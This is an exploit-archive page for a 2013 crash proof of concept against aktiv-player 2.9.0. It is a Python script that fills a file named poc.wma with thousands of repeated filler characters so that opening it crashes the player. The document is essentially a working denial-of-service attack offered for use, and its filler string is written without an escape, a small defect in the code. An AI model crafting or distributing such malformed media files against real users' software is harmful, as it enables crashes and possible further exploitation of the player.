[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : aktiv-player version 2.9.0 Crash PoC
# Published : 2013-03-15
# Author :
# Previous Title : TP-Link TL-WR740N Wireless Router - Denial Of Service Exploit
# Next Title : MinaliC Webserver 2.0.0 - Buffer Overflow


# !/usr/bin/python
# Exploit Title: aktiv-player version 2.9.0 Crash PoC
# Exploit Author: metacom
# RST 
# Vendor Homepage: http://www.goforsharing.com/home-mainmenu-1/aktiv-player-mainmenu-131.html
# Tested on: Windows 7 German

filename = "poc.wma"

buffer = "x41" * 3000
exploit = buffer 
 
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()